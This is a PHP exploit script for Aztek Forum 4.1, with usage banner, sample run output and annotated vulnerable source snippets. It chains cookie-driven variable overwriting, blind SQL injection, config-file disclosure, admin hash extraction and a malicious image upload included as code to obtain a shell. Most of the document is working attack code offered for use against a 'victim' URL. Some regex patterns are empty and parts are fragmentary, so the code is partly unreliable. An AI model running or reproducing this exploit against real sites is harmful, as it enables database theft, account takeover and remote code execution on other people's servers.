= 1.2
error_reporting(E_ALL ^ E_NOTICE);
header> Aztek Forum 4.1 Multiple Vulnerabilities Exploit
header> ================================================== sploit> Owner -> root
status> Trying to register a new user
sploit> Login/Password -> phpsploit8435
status> Trying to get databases informations
sploit> Full Path Disclosure -> /home/www/aztekforum/forum/load.php
sploit> Done (./avatar/phpsploit8435.jpg)
sploit> $dbhost -> localhost
sploit> $usebdd -> aztek
sploit> $user -> root
sploit> $password -> toor
sploit> $salt -> atk
status> Trying to get the administrator login/passwd
sploit> Username length 7
sploit> Username -> darkfig
sploit> Password length 13
sploit> Password -> atovlv6iH1rUo
sploit> Salt -> atk (Standard DES hash)
sploit> Enter the decrypted password for continue: hello
status> Uploading a malicious picture
status> Trying to get logged in
sploit> Done
status> Creating a hidden forum
sploit> Done
status> Trying to include the picture
$shell> whoami
$shell> exit
if($argc < 2)
print "\n---------------------------------------------------------";
print "\nAffected.scr..: Aztek Forum V4.1";
print "\nPoc.ID........: 21070125";
print "\nType..........: Multiple vulnerability";
print "\nConditions....: None =)";
print "\nRisk.level....: High";
print "\nSrc.download..: www.forum-aztek.com";
print "\nPoc.link......: acid-root.new.fr/poc/21070125.txt";
print "\nCredits.......: DarkFig";
print "\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php ";
print "\nProxyOptions..: ";
print "\nExample.......: php xpl.php http://victim.com/";
print "\n---------------------------------------------------------";
---[ CODE ./common/config.php
@extract($_POST); // Variables en POST
@extract($_GET); // Variables en GET
@extract($_COOKIE); // Variable des cookies
@extract($_SERVER); // Variable Server
+-> All variables initialized before the inclusion can be overwritten.
---[ CODE ./common/safety.php
$BANNED_STRING[] = "%22";
$BANNED_STRING[] = "%23";
$BANNED_STRING[] = "%47";
foreach($_GET as $key=>$value) ...
$_POST[$key] = str_replace($BANNED_STRING[$i], "", $_POST[$key]);
$$key = $_POST[$key];
foreach($_POST as $key=>$value) ...
$_GET[$key] = str_replace($BANNED_STRING[$i], "", $_GET[$key]);
$$key = $_GET[$key];
+-> Filter can be bypassed with extract($_COOKIE)
---[ CODE ./forum/load.php
if(!empty($fid)) $FORUM=$fid;
$sql=dbquery("SELECT * FROM atk_forums WHERE id=$FORUM",33,29);
+-> Blind SQL Injection without quote
---[ CODE ./index/main.php
if($PF["top_url"]) @include($PF["top_url"]);
+-> Remote File Inclusion (admin rights needed in order to insert "top_url" in "atk_forums")
---[ CODE ./index/common_actions.php
$file = $_FILES['upload']['tmp_name']; ...
if(@copy($file,$path_file)) $avatar=$path_file;
+-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =).
$xpl = new phpsploit();
if(!empty($prs)) $xpl->proxy($prs);
if(!empty($pra)) $xpl->proxyauth($pra);
print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ===================================================";
if(preg_match("#href='\./index\.php\?owner=(\S*)'#i",$xpl->getcontent($xpl->get($url.'forum.php?fid=-1%20or%201=1')),$matches)) print "\nsploit> Owner -> ".$matches[1];
else die("\nsploit> Exploit failed");
$owner = $matches[1];
print "\nstatus> Trying to register a new user";
$name = "phpsploit".rand();
print "\nsploit> Login/Password -> $name";
print "\nstatus> Trying to get databases informations";
if(preg_match("#file (.*) in function#i",$xpl->getcontent(),$matches)) print "\nsploit> Full Path Disclosure -> ".$matches[1];
else print("\nsploit> Failed");
$wanted = str_replace("forum/load.php","common/bddconf.php",$matches[1]);
if(preg_match("##i",$xpl->getcontent(),$matches)) print "\nsploit> Done (".$matches[1].")";
else print("\nsploit> Failed");
$avatarur = $matches[1];
print "\nsploit> ".strtolower($vars[1][$z])." -> ".$vars[2][$z];
print "\nstatus> Trying to get the administrator login/passwd";
$headers = array("Username","Password");
$fields = array("login","passwd");
print "\nsploit> ".$headers[$a]." length ";
if(!preg_match("##i",$xpl->getcontent($xpl->get($url."forum.php")))) {
$length[$a] .= chr($c);
print chr($c);
print "\nsploit> ".$headers[$a]." -> ";
if(!preg_match("##i",$xpl->getcontent($xpl->get($url."forum.php")))) {
$value[$a] .= chr($e);
print chr($e);
$salt = !empty($vars[2][4]) ? $vars[2][4] : 'atk'; # Always the same salt ...
print "\nsploit> Salt -> $salt (Standard DES hash)";
print "\nsploit> Enter the decrypted password for continue: ";
$password = trim(fgets(STDIN));
$xpl->addcookie("fid","-1 or 1=1");
print "status> Uploading a malicious picture";
$formdata = array(frmdt_url => $url."?owner=$owner&action=profile",
"email" => "$name@hotmail.coum",
"url" => "http://",
"upload" => array(frmdt_type => "image/jpg",
frmdt_filename => "hello.jpg",
frmdt_content => ""),
"avatar" => "./avatar/welcome.jpg");
print "\nstatus> Trying to get logged in";
if(preg_match("#ATK_ADMIN#i",$xpl->showcookie())) print "\nsploit> Done";
else die("\nsploit> Exploit failed");
print "\nstatus> Creating a hidden forum";